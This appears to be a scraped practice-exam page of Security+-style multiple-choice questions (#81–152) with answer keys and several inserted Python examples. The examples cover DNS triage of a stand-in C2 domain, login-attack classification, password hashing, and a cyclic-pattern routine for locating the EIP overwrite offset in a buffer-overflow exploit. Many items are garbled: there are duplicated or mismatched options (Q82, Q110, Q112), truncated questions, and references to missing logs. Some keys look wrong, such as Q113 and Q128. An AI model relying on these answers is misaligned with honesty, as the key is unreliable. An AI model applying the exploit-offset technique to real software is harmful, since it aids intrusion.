B. The signal on the WAP needs to be increased in that section of the building
C. The certificates have expired on the devices and need to be reinstalled
D. The users in that section of the building are on a VLAN that is being blocked by the firewall
Correct Answer: A
Question #81
An organization is concerned about hackers potentially entering a facility and plugging in a remotely accessible Kali Linux box. Which of the following should be the first lines of defense against such an attack? (Choose two.)
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing campaign
Correct Answer: BC
Question #82
A security administrator would like to ensure all cloud servers will have software preinstalled for facilitating vulnerability scanning and continuous monitoring. Which of the following concepts should the administrator utilize?
A. Provisioning
B. Staging
C. Staging
D. Quality assurance
View answer
Correct Answer: A
Question #83
Which of the following is the MOST effective way to detect security flaws present on third-party libraries embedded on software before it is released into production?
A. Employ different techniques for server- and client-side validations
B. Use a different version control system for third-party libraries
C. Implement a vulnerability scan to assess dependencies earlier in the SDLC
D. Increase the number of penetration tests before software release
View answer
Correct Answer: C
Question #84
Which of the following uses SAML for authentication?
A. TOTP
B. Federation
C. Kerberos
D. HOTP
View answer
Correct Answer: B
Question #85
SIMULATION
A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.
INSTRUCTIONS
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:
User: guest01
Password: guestpass
If at any time you would like to bring back the initial state of the simulation, please clic
A. See explanation below
View answer
Correct Answer: A
Question #86
A security analyst receives a SIEM alert that someone logged in to the appadmin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:Which of the following can the security analyst conclude?
A. A replay attack is being conducted against the application
B. An injection attack is being conducted against a user authentication system
C. A service account password may have been changed, resulting in continuous failed logins within the application
D. A credentialed vulnerability scanner attack is testing several CVEs against the application
View answer
Correct Answer: B
Question #87
Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous validation
D. Continuous integration
View answer
Correct Answer: D
Question #88
A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company consult?
A. GDPR
B. ISO
C. NIST
D. PCI DSS
View answer
Correct Answer: A
Question #89
An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to prevent reinfection from the infection vector?
A. Prevent connections over TFTP from the internal network
B. Create a firewall rule that blocks port 22 from the internet to the server
C. Disable file sharing over port 445 to the server
D. Block port 3389 inbound from untrusted networks
View answer
Correct Answer: D
Question #90
A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?
A. Security patches failed to install due to a version incompatibility
B. An adversary altered the vulnerability scan reports
C. A zero-day vulnerability was used to exploit the web server
D. The scan reported a false negative for the vulnerability
View answer
Correct Answer: D
Question #91
A company wants to restrict emailing of PHI documents. The company is implementing a DLP solution. In order to restrict PHI documents, which of the following should be performed FIRST?
A. Retention
B. Governance
C. Classification
D. Change management
View answer
Correct Answer: C
Question #92
Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
View answer
Correct Answer: C
Question #93
A company is moving to a new location. The systems administrator has provided the following server room requirements to the facilities staff:
• Consistent power levels in case of brownouts or voltage spikes
• A minimum of 30 minutes runtime following a power outage
• Ability to trigger graceful shutdowns of critical systems
Which of the following would BEST meet the requirements?
A. Maintaining a standby, gas-powered generator
B. Using large surge suppressors on computer equipment
C. Configuring managed PDUs to monitor power levels
D. Deploying an appropriately sized, network-connected UPS device
View answer
Correct Answer: D
Question #94
Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?
A. Machine learning
B. DNS sinkhole
C. Blocklist
D. Honeypot
View answer
Correct Answer: B
Question #95
During a recent penetration test, the tester discovers large amounts of data were exfiltrated over the course of 12 months via the internet. The penetration tester stops the test to inform the client of the findings. Which of the following should be the client's NEXT step to mitigate the issue?
A. Conduct a full vulnerability scan to identify possible vulnerabilities
B. Perform containment on the critical servers and resources
C. Review the firewall and identify the source of the active connection
D. Disconnect the entire infrastructure from the internet
View answer
Correct Answer: B
Question #96
A security analyst discovers that a company's username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?
A. Create DLP controls that prevent documents from leaving the network
B. Implement salting and hashing
C. Configure the web content filter to block access to the forum
D. Increase password complexity requirements
View answer
Correct Answer: B
Question #97
Which of the following is an example of risk avoidance?
A. Installing security updates directly in production to expedite vulnerability fixes
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment
View answer
Correct Answer: C
Question #98
A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?
A. POP
B. IPSec
C. IMAP
D. PGP
View answer
Correct Answer: D
Question #99
Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?
A. Smart card
B. Push notifications
C. Attestation service
D. HMAC-based
E. One-time password
View answer
Correct Answer: B
Question #100
A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it. Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the following should the company do to help accomplish this goal?
A. Classify the data
B. Mask the data
C. Assign the application owner
D. Perform a risk analysis
View answer
Correct Answer: A
Question #101
Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?
A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding
View answer
Correct Answer: A
Question #102
Which of the following documents specifies what to do in the event of catastrophic loss of a physical or virtual system?
A. Data retention plan
B. Incident response plan
C. Disaster recovery plan
D. Communication plan
View answer
Correct Answer: C
Question #103
An employee's company email is configured with conditional access and requires that MFA is enabled and used. An example of MFA is a phone call and:
A. A push notification
B. A password
C. An SMS message
D. An authentication application
View answer
Correct Answer: B
Question #104
An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection mechanism to deter malicious activities. Which of the following is being implemented?
A. Proximity cards with guards
B. Fence with electricity
C. Drones with alarms
D. Motion sensors with signage
View answer
Correct Answer: D
Question #105
An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?
A. Document the collection and require a sign-off when possession changes
B. Lock the device in a safe or other secure location to prevent theft or alteration
C. Place the device in a Faraday cage to prevent corruption of the data
D. Record the collection in a blockchain-protected public ledger
View answer
Correct Answer: A
Question #106
Which of the following should customers who are involved with UI developer agreements be concerned with when considering the use of these products on highly sensitive projects?
A. Weak configurations
B. Integration activities
C. Insecure user accounts
D. Outsourced code development
View answer
Correct Answer: A
Question #107
Which of the following procedures would be performed after the root cause of a security incident has been identified to help avoid future incidents from occurring?
A. Walk-throughs
B. Lessons learned
C. Attack framework alignment
D. Containment
View answer
Correct Answer: B
Question #108
Which of the following would provide guidelines on how to label new network devices as part of the initial configuration?
A. IP schema
B. Application baseline configuration
C. Standard naming convention policy
D. Wireless LAN and network perimeter diagram
View answer
Correct Answer: C
Question #109
A security analyst is investigating what appears to be unauthorized access to a corporate web application. The security analyst reviews the web server logs and finds the following entries: Which of the following password attacks is taking place?
A. Dictionary
B. Brute-force
C. Rainbow table
D. Spraying
View answer
Correct Answer: B
Question #110
An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users' corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?
A. Brute-force
B. Keylogger
C. Dictionary
D. Rainbow
View answer
Correct Answer: C
Question #111
Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?
A. NAC
B. DLP
C. IDS
D. MFA
View answer
Correct Answer: A
Question #112
To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST accommodate the request?
A. aaS
B. aaS
C. aaS
D. SaaS
View answer
Correct Answer: D
Question #113
A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator’s activities?
A. Continuous deployment
B. Continuous integration
C. Data owners
D. Data processor
View answer
Correct Answer: D
Question #114
The Chief Information Security Officer (CISO) has requested that a third-party vendor provide supporting documents that show proper controls are in place to protect customer data. Which of the following would be BEST for the third-party vendor to provide to the CISO?
A. GDPR compliance attestation
B. Cloud Security Alliance materials
C. SOC 2 Type 2 report
D. NIST RMF workbooks
View answer
Correct Answer: C
Question #115
Which of the following describes a social engineering technique that seeks to exploit a person's sense of urgency?
A. A phishing email stating a cash settlement has been awarded but will expire soon
B. A smishing message stating a package is scheduled for pickup
C. A vishing call that requests a donation be made to a local charity
D. A SPIM notification claiming to be undercover law enforcement investigating a cybercrime
View answer
Correct Answer: A
Question #116
During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server. Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to maintain a presence in the network. In which of the following stages of the Cyber Kill Chain is the adversary currently operating?
A. Reconnaissance
B. Command and control
C. Actions on objective
D. Exploitation
View answer
Correct Answer: B
Question #117
Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?
A. Web metadata
B. Bandwidth monitors
C. System files
D. Correlation dashboards
View answer
Correct Answer: B
Question #118
A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?
A. EAP
B. TLS
C. HTTPS
D. AES
View answer
Correct Answer: D
Question #119
Which of the following is used to ensure that evidence is admissible in legal proceedings when it is collected and provided to the authorities?
A. Chain of custody
B. Legal hold
C. Event log
D. Artifacts
View answer
Correct Answer: A
Question #120
A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack at Layer 7? (Choose two.)
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. NIDS
View answer
Correct Answer: BD
Question #121
On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?
A. Shoulder surfing
B. Watering-hole attack
C. Tailgating
D. Impersonation
View answer
Correct Answer: C
Question #122
A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be: Click here to unsubscribe Which of the following will the forensics i
A. SQL injection
B. Broken authentication
C. XSS
D. CSRF
View answer
Correct Answer: D
Question #123
A security analyst needs to produce a document that details how a security incident occurred, the steps that were taken for recovery, and how future incidents can be avoided. During which of the following stages of the response process will this activity take place?
A. Recovery
B. Identification
C. Lessons learned
D. Preparation
View answer
Correct Answer: C
Question #124
An employee received multiple messages on a mobile device. The messages were instructing the employee to pair the device to an unknown device. Which of the following best describes what a malicious person might be doing to cause this issue to occur?
A. Jamming
B. Bluesnarfing
C. Evil twin attack
D. Rogue access point
View answer
Correct Answer: B
Question #125
Which of the following types of disaster recovery plan exercises requires the least interruption to IT operations?
A. Parallel
B. Full-scale
C. Tabletop
D. Simulation
View answer
Correct Answer: C
Question #126
A company wants to improve end users' experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner's website?
A. Directory service
B. AAA server
C. Federation
D. Multifactor authentication
View answer
Correct Answer: C
Question #127
A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally.
A. OpenID is mandatory to make the MFA requirements work
B. An incorrect browser has been detected by the SAML application
C. The access device has a trusted certificate installed that is overwriting the session token
D. The user's IP address is changing between logins, but the application is not invalidating the token
View answer
Correct Answer: D
Question #128
Which of the following can be used to detect a hacker who is stealing company data over port 80?
A. GPS tagging
B. Remote wipe
C. Screen lock timer
D. SEAndroid
View answer
Correct Answer: D
Question #129
During a security incident investigation, an analyst consults the company’s SIEM and sees an event concerning high traffic to a known, malicious command-and-control server. The analyst would like to determine the number of company workstations that may be impacted by this issue. Which of the following can provide this information?
A. WAF logs
B. DNS logs
C. System logs
D. Application logs
View answer
Correct Answer: B
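The following Python snippet is an added example, not material from the question bank, of the DNS-log triage the correct answer points at: given the C2 domain from the SIEM alert, count the distinct internal clients that resolved it (or any name under it). The resolver query-log lines are constructed for this example in a BIND-style shape, and the domain `evil-c2.example` and client addresses are made up.

```python
"""Count workstations that resolved a known C2 domain (added example).

Input is a constructed, BIND-like query log; the indicator is a hypothetical
domain.  Subdomain matches count too, because malware frequently rotates
labels under a fixed parent (beacon.<c2>, update.<c2>, ...).
"""
import re
from collections import Counter

# Constructed sample lines (not real resolver output).
DNS_LOG = """\
01-May-2024 09:00:01.123 client 10.0.5.21#51233: query: update.evil-c2.example IN A + (10.0.0.53)
01-May-2024 09:00:02.456 client 10.0.5.22#49022: query: www.comptia.org IN A + (10.0.0.53)
01-May-2024 09:00:03.789 client 10.0.5.21#51234: query: update.evil-c2.example IN A + (10.0.0.53)
01-May-2024 09:00:04.001 client 10.0.7.9#40011: query: beacon.update.evil-c2.example IN A + (10.0.0.53)
01-May-2024 09:00:05.002 client 10.0.5.30#40012: query: update.evil-c2.example IN AAAA + (10.0.0.53)
"""

# Pulls the client IP, queried name and record type out of one log line.
QUERY_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def matches_indicator(qname, indicator):
    """True if qname equals the indicator or is a subdomain of it (case-insensitive)."""
    q = qname.rstrip(".").lower()
    i = indicator.rstrip(".").lower()
    return q == i or q.endswith("." + i)


def impacted_hosts(log_text, indicator):
    """Return Counter{client_ip: query count} for clients that resolved the indicator."""
    hits = Counter()
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m and matches_indicator(m["qname"], indicator):
            hits[m["ip"]] += 1
    return hits


if __name__ == "__main__":
    hosts = impacted_hosts(DNS_LOG, "evil-c2.example")
    print(f"{len(hosts)} host(s) resolved the indicator:")
    for ip, n in hosts.most_common():
        print(f"  {ip}  {n} quer{'y' if n == 1 else 'ies'}")
```

One caveat a practitioner should keep in mind: if workstations query a forwarding resolver that in turn queries the logging server, every hit shows the forwarder's address, so the count has to come from the resolver closest to the clients (or from endpoint DNS telemetry), and DHCP lease history is needed to turn addresses into hostnames for the timeframe of the alert.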
Question #130
A security analyst needs to be able to search and correlate logs from multiple sources in a single tool. Which of the following would BEST allow a security analyst to have this ability?
A. SOAR
B. SIEM
C. Log collectors
D. Network-attached storage
View answer
Correct Answer: B
Question #131
If a current private key is compromised, which of the following would ensure it cannot be used to decrypt all historical data?
A. Perfect forward secrecy
B. Elliptic-curve cryptography
C. Key stretching
D. Homomorphic encryption
View answer
Correct Answer: A
Question #132
A user's account is constantly being locked out. Upon further review, a security analyst found the following in the SIEM: Which of the following describes what is occurring?
A. An attacker is utilizing a password-spraying attack against the account
B. An attacker is utilizing a dictionary attack against the account
C. An attacker is utilizing a brute-force attack against the account
D. An attacker is utilizing a rainbow table attack against the account
View answer
Correct Answer: C
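Questions #109 and #132 both turn on reading failed-login entries and naming the attack, so here is one added example (not part of the original page; the log screenshots those questions refer to are not reproduced) that does the classification over constructed log lines. The log format, the `appadmin` account, the addresses and the thresholds are assumptions for the demonstration. The logic behind them is what the two questions test: a brute-force attack hammers one account with many guesses and trips the lockout threshold (the "constantly locked out" symptom), whereas password spraying tries one or two guesses against many accounts precisely to stay under that threshold.

```python
"""Classify failed-login patterns as brute-force vs. password spraying (added example).

Log lines below are constructed in a hypothetical 'auth.log'-like format.
Dictionary vs. pure brute-force cannot be told apart from failure counts alone,
since the guessed password should never appear in a log, so both fall under
"brute-force" here.
"""
import re
from collections import defaultdict
from datetime import datetime

BRUTE_FORCE_LOG = """\
2024-05-01T10:00:01Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:02Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:02Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:03Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:03Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:04Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:04Z 203.0.113.9 user=appadmin result=fail
2024-05-01T10:00:05Z 203.0.113.9 user=appadmin result=fail
"""

SPRAY_LOG = """\
2024-05-01T11:00:00Z 198.51.100.7 user=alice result=fail
2024-05-01T11:00:30Z 198.51.100.7 user=bob result=fail
2024-05-01T11:01:00Z 198.51.100.7 user=carol result=fail
2024-05-01T11:01:30Z 198.51.100.7 user=dave result=fail
2024-05-01T11:02:00Z 198.51.100.7 user=erin result=fail
2024-05-01T11:02:30Z 198.51.100.7 user=frank result=success
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$")


def parse(log_text):
    """Yield (timestamp, source_ip, user, success) for each well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # tolerate lines in another format
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["src"], m["user"], m["result"] == "success"


def classify(log_text, min_attempts=5, spray_users=4, lockout_threshold=3):
    """Return {source_ip: (verdict, detail)} for every source with failed logins."""
    failures = defaultdict(lambda: defaultdict(int))   # src -> user -> count
    times = defaultdict(list)
    for ts, src, user, ok in parse(log_text):
        if not ok:
            failures[src][user] += 1
            times[src].append(ts)

    verdicts = {}
    for src, per_user in failures.items():
        total = sum(per_user.values())
        worst = max(per_user.values())
        span = (max(times[src]) - min(times[src])).total_seconds()
        if len(per_user) == 1 and total >= min_attempts:
            user = next(iter(per_user))
            verdicts[src] = ("brute-force",
                             f"{total} failures for {user} in {span:.0f}s; "
                             f"exceeds lockout threshold {lockout_threshold}")
        elif len(per_user) >= spray_users and worst < lockout_threshold:
            verdicts[src] = ("password-spraying",
                             f"{len(per_user)} accounts, at most {worst} failure(s) each; "
                             f"stays under lockout threshold {lockout_threshold}")
        else:
            verdicts[src] = ("inconclusive", f"{total} failures across {len(per_user)} account(s)")
    return verdicts


if __name__ == "__main__":
    for name, log in (("brute", BRUTE_FORCE_LOG), ("spray", SPRAY_LOG)):
        for src, (verdict, detail) in classify(log).items():
            print(f"{name}: {src} -> {verdict} ({detail})")
```

Note that the spraying sample ends with a success for `frank`; in a real investigation that line is the one to act on first, since a single success following a low-and-slow sweep is a compromised account, not noise.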
Question #133
A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager's concerns?
A. Implement a full system upgrade
B. Perform a physical-to-virtual migration
C. Install uninterruptible power supplies
D. Purchase cybersecurity insurance
View answer
Correct Answer: B
Question #134
A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would MOST likely have prevented this breach?
A. A firewall
B. A device PIN
C. A USB data blocker
D. Biometrics
View answer
Correct Answer: C
Question #135
Which of the following would be indicative of a hidden audio file found inside of a piece of source code?
A. Steganography
B. Homomorphic encryption
C. Cipher suite
D. Blockchain
View answer
Correct Answer: A
Question #136
A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit information to a personal bank account. Which of the following does this action describe?
A. Insider threat
B. Social engineering
C. Third-party risk
D. Data breach
View answer
Correct Answer: A
Question #137
A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?
A. Data owner
B. Data processor
C. Data steward
D. Data collector
View answer
Correct Answer: D
Question #138
A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:
A. a rootkit
B. a PUP
C. a backdoor
D. ransomware
E. a RAT
View answer
Correct Answer: B
Question #139
A user is attempting to navigate to a website from inside the company network using a desktop. When the user types in the URL, https://www.site.com, the user is presented with a certificate mismatch warning from the browser. The user does not receive a warning when visiting http://www.anothersite.com. Which of the following describes this attack?
A. On-path
B. Domain hijacking
C. DNS poisoning
D. Evil twin
View answer
Correct Answer: B
Question #140
An organization is moving away from the use of client-side and server-side certificates for EAP. The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
View answer
Correct Answer: B
Question #141
The board of directors at a company contracted with an insurance firm to limit the organization's liability. Which of the following risk management practices does this BEST describe?
A. Transference
B. Avoidance
C. Mitigation
D. Acknowledgement
View answer
Correct Answer: A
Question #142
A user's laptop constantly disconnects from the Wi-Fi network. Once the laptop reconnects, the user can reach the internet but cannot access shared folders or other network resources. Which of the following types of attacks is the user most likely experiencing?
A. Bluejacking
B. Jamming
C. Rogue access point
D. Evil twin
View answer
Correct Answer: D
Question #143
A penetration tester is fuzzing an application to identify where on the stack the EIP (the saved return address) is located in memory. Which of the following attacks is the penetration tester planning to execute?
A. Race condition
B. Pass-the-hash
C. Buffer overflow
D. XSS
View answer
Correct Answer: C
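What "fuzzing to find where EIP is" looks like in practice, as an added example that is not part of the original question set: the tester sends a non-repeating cyclic pattern instead of a run of "A"s, reads the value the debugger reports in EIP when the program crashes, and searches the pattern for those four bytes to learn the exact offset at which the return address is overwritten. The pattern generator below follows the familiar `Aa0Aa1…` scheme; the 264-byte buffer, the little-endian x86 target and `model_crash()`, which merely models where the bytes land in a stack frame, are hypothetical stand-ins for a real vulnerable program.

```python
"""Locate the EIP-overwrite offset with a cyclic pattern (added example).

Models the pattern_create / pattern_offset step of a stack-overflow exploit:
send a non-repeating pattern, read the EIP value the debugger reports at the
crash, and search the pattern for those bytes.  The stack layout in
model_crash() is a hypothetical stand-in for the real target.
"""
import string
import struct


def pattern_create(length):
    """Cyclic pattern Aa0Aa1Aa2... in which every 3-byte chunk is unique."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes is not unique")


def pattern_offset(pattern, eip):
    """Offset in `pattern` of the 4 bytes that ended up in EIP.

    `eip` is the integer the debugger shows (e.g. 0x6A413969); on a
    little-endian x86 target the bytes are stored reversed, so pack with "<I".
    Returns -1 if the value did not come from the pattern.
    """
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    return pattern.find(needle)


BUF_SIZE = 264   # hypothetical target: 264-byte buffer, then 4 bytes of saved EBP, then EIP


def model_crash(payload, buf_size=BUF_SIZE):
    """Toy stack frame: whatever lands past buffer+EBP becomes the return address.

    Returns the EIP value a debugger would report, or None if no overwrite.
    """
    start = buf_size + 4
    if len(payload) < start + 4:
        return None
    return struct.unpack("<I", payload[start:start + 4])[0]


def find_offset_and_control(target_eip=0xDEADBEEF, fuzz_len=500):
    """Run the two-step method: fuzz with a pattern, then place a chosen EIP."""
    pattern = pattern_create(fuzz_len)
    crash_eip = model_crash(pattern.encode("ascii"))      # step 1: crash with the pattern
    offset = pattern_offset(pattern, crash_eip)           # step 2: where did EIP's bytes come from?
    payload = b"A" * offset + struct.pack("<I", target_eip)
    return offset, model_crash(payload)                   # (268, 0xDEADBEEF)


if __name__ == "__main__":
    off, eip = find_offset_and_control()
    print(f"EIP overwritten at offset {off}; controlled value now 0x{eip:08X}")
```

The reason a cyclic pattern beats a plain run of "A"s is in `pattern_offset`: 0x41414141 tells you only that you overwrote EIP, while a unique 4-byte window tells you exactly how many bytes of padding to put before the address you actually want there.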
Question #144
An administrator needs to protect user passwords and has been advised to hash the passwords. Which of the following BEST describes what the administrator is being advised to do?
A. Perform a mathematical operation on the passwords that will convert them into unique strings
B. Add extra data to the passwords so their length is increased, making them harder to brute force
C. Store all passwords in the system in a rainbow table that has a centralized location
D. Enforce the use of one-time passwords that are changed for every login session
View answer
Correct Answer: A
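Question #96 (salting and hashing) and this question (hashing as a one-way mathematical operation) describe two halves of the same control, so here is one added example covering both; it is not code from the original page. It stores each password as a random salt plus a PBKDF2-HMAC-SHA256 digest and verifies a login by recomputing with the stored salt, so a leaked table reveals neither the passwords nor which users share one. The iteration count, salt size and the sample users are assumptions for the demonstration.

```python
"""Salted, iterated password hashing and verification (added example).

Shows the "mathematical operation" of Q#144 and the "salting and hashing" of
Q#96 together: each password is stored as a random salt plus the PBKDF2 output,
so a leaked table exposes neither the password nor which users share one.
Iteration count, salt size and the sample users are assumptions for this demo.
"""
import hashlib
import hmac
import os

ITERATIONS = 600_000      # PBKDF2-HMAC-SHA256 work factor (assumed; tune so a hash takes ~0.3 s)
SALT_BYTES = 16


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)          # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt/iterations and compare in constant time."""
    try:
        algo, iterations, salt_hex, hash_hex = stored.split("$")
    except ValueError:
        return False                           # not a record in our format (e.g. legacy plaintext)
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), hash_hex)


def demo_database():
    """Two constructed users with the same password: stored values still differ."""
    return {user: hash_password("Summer2024!") for user in ("alice", "bob")}


if __name__ == "__main__":
    rows = demo_database()
    for user, record in rows.items():
        print(user, record)
    print("alice logs in:", verify_password("Summer2024!", rows["alice"]))
    print("wrong password:", verify_password("summer2024!", rows["alice"]))
```

Storing the algorithm and iteration count alongside the salt is what lets you raise the work factor later and re-hash each user transparently on their next successful login; a bare digest column cannot be migrated that way.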
Question #145
While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an authorized device. Given the table below: Which of the following should be the administrator's NEXT step to detect if there is a rogue system without impacting availability?
A. Conduct a ping sweep
B. Physically check each system
C. Deny internet access to the "UNKNOWN" hostname
D. Apply MAC filtering
View answer
Correct Answer: A
Question #146
A security proposal was set up to track requests for remote access by creating a baseline of the users' common sign-in properties. When a baseline deviation is detected, an MFA challenge will be triggered. Which of the following should be configured in order to deploy the proposal?
A. Context-aware authentication
B. Simultaneous authentication of equals
C. Extensible authentication protocol
D. Agentless network access control
View answer
Correct Answer: A
Question #147
An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following activity:
- A user enters comptia.org into a web browser.
- The website that appears is not the comptia.org site.
- The website is a malicious site from the attacker.
- Users in a different office are not having this issue.
Which of the following types of attacks was observed?
A. On-path attack
B. DNS poisoning
C. Locator (URL) redirection
D. Domain hijacking
View answer
Correct Answer: B
Question #148
Which of the following BEST describes the process of documenting who has access to evidence?
A. Order of volatility
B. Chain of custody
C. Non-repudiation
D. Admissibility
View answer
Correct Answer: B
Question #149
Which of the following holds staff accountable while escorting unauthorized personnel?
A. Locks
B. Badges
C. Cameras
D. Visitor logs
View answer
Correct Answer: D
Question #150
Which of the following processes will eliminate data using a method that will allow the storage device to be reused after the process is complete?
A. Pulverizing
B. Overwriting
C. Shredding
D. Degaussing
View answer
Correct Answer: B
Question #151
A security analyst needs to centrally manage credentials and permissions to the company's network devices. The following security requirements must be met:
• All actions performed by the network staff must be logged.
• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP.
Which of the following authentication protocols should the analyst choose?
A. Kerberos
B. CHAP
C. TACACS+
D. RADIUS
View answer
Correct Answer: C
Question #152
A security architect is required to deploy to conference rooms some workstations that will allow sensitive data to be displayed on large screens. Due to the nature of the data, it cannot be stored in the conference rooms. The file share is located in a local data center. Which of the following should the security architect recommend to BEST meet the requirement?
A. Fog computing and KVMs
B. VDI and thin clients
C. Private cloud and DLP
D. Full drive encryption and thick clients
View answer
Correct Answer: B
